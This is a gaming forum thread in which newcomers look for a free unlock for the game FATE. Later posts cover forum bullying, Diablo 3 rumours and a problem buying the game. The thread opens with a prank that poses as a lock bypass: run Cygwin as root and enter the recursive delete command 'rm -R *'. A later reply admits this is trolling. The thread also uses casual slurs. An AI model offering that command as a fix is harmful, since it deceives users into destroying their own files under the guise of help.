Ok, pay attention, because this a fairly comlex process:

1) Download Cygwin.
2) Run Cygwin, and make sure that you're logged in as Root.
3) Once you're in the shell, type "rm -R *" into the command line.
4) Congratulations, you just bypassed the lock!

How do you get the root password?

Ok, I definitely found this forum the same way these other cheap newbs did; in search of an unlock code. What can I say, spending money sucks!

I just got a new lap top after exiling myself from electronic entertainment for a couple years.

This thread did remind me of some of the reasons why I stopped playing video games (online and tournament fighting). One of those being elite pretentiousness characteristic of subcultures ripe with insecurities. It is a sad flaw to look down on or to make fun those who do not initially share the "knowledge" that you yourselves were once ignorant of as well.

I am not hear to talk shit or point fingers. All I wanted to say was that you are obviously passionate about your hobbies for a reason. Doesn't it make since to share that passion with those that don't yet have it instead of looking down your noses at them and pushing them away from something that (supposedly) brings you so much joy? Sorry, not trying to be a hippy. It just seemed like these 7 pages of bullying could have been avoided by saying that this forum (along with its members) doesn't wanna risk any legal implications and doesn't condone such blatant, out-in-the-open behavior, blah, blah, blah. Not to mention, none of them even understood that they were being jerked around anyway!

I do have a couple related questions though (if I haven't already made enemies with all the gurus):

1) There was talk about internet "coins" and unlocking more than once. If I buy FATE, and get the code, do I need to use it more than once, and does it run out?!

2) Also, the only reason I would even buy such a bastardized game is because I am tired of waiting for Diablo 3! I'm not at all "in the know", and if anyone could fill me in on if it's going to exist and even be worth it when it does I would be greatful.

I hope that I didn't step on too many toes, I just don't really enjoy watching flies getting their wings pulled off. I used to do that shit, and I never woke up the next morning felling like a better person because of it.

(1) It's much more entertaining this way.
(2) The key word there is "blatant". What would you think if your brand new next door neighbor poked his head over the fence and yelled "Hey guys, do you know where I can BUY SOME DRUGS? Yes, it's going to exist, just not anytime real soon. The rumormill says someone recently admitted to working on the soundtrack, but rumors are rumors. Have you tried Sacred or Throne of Darkness or Titan Quest? Also, Mythos, by the Fate people, is coming out soon and will be mostly free.

Okay, so no bull shit (or tub shit), I decided to burn the cash and purchase FATE. But I seem to keep getting looped through the same menus; after "registering" with Wild Tangent and signing in, and clicking on "Buy It", and clicking on "Check Out", I get looped back to the "Sign In" or "Register" screen where I enter my email address and the password (that they sent me), etc....!

I came looking for a free ride, but I didn't ask for it "out loud" like some retard or narc. I don't mind spending the money, I would just prefer not to when possible. Seeing that that is not a possibility, can someone just tell me how I can actually purchase this Diablo bastard child?! I guess I could have just asked the goons at WT, but I thought that I would ask the gurus here since they enjoy helping so much! :D
